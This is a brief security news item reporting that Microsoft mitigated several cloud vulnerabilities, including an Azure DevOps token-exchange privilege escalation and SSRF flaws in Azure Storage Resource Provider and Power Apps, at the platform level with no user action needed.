The most critical vulnerability, found in Azure DevOps, allowed attackers with project-level access to escalate their privileges by exchanging short-term pipeline job tokens for long-term ones, potentially gaining extensive access within a project environment. Additional vulnerabilities included CVE-2025-29827 in Azure Automation, where improper authorization could enable a user to elevate privileges, CVE-2025-29972, an SSRF vulnerability in Azure Storage Resource Provider, and CVE-2025-47733 in Microsoft Power Apps, which allowed unauthorized information disclosure over a network through a Server-Side Request Forgery (SSRF). Despite the severity of these vulnerabilities, Microsoft has assured users that no action is required on their part. The company has already mitigated the flaws at the platform level, preventing potential exploitation. These patches underscore Microsoft's commitment to maintaining a secure cloud environment and highlight the ongoing need for robust security practices within cloud-native development. Recommended read:
References :
|
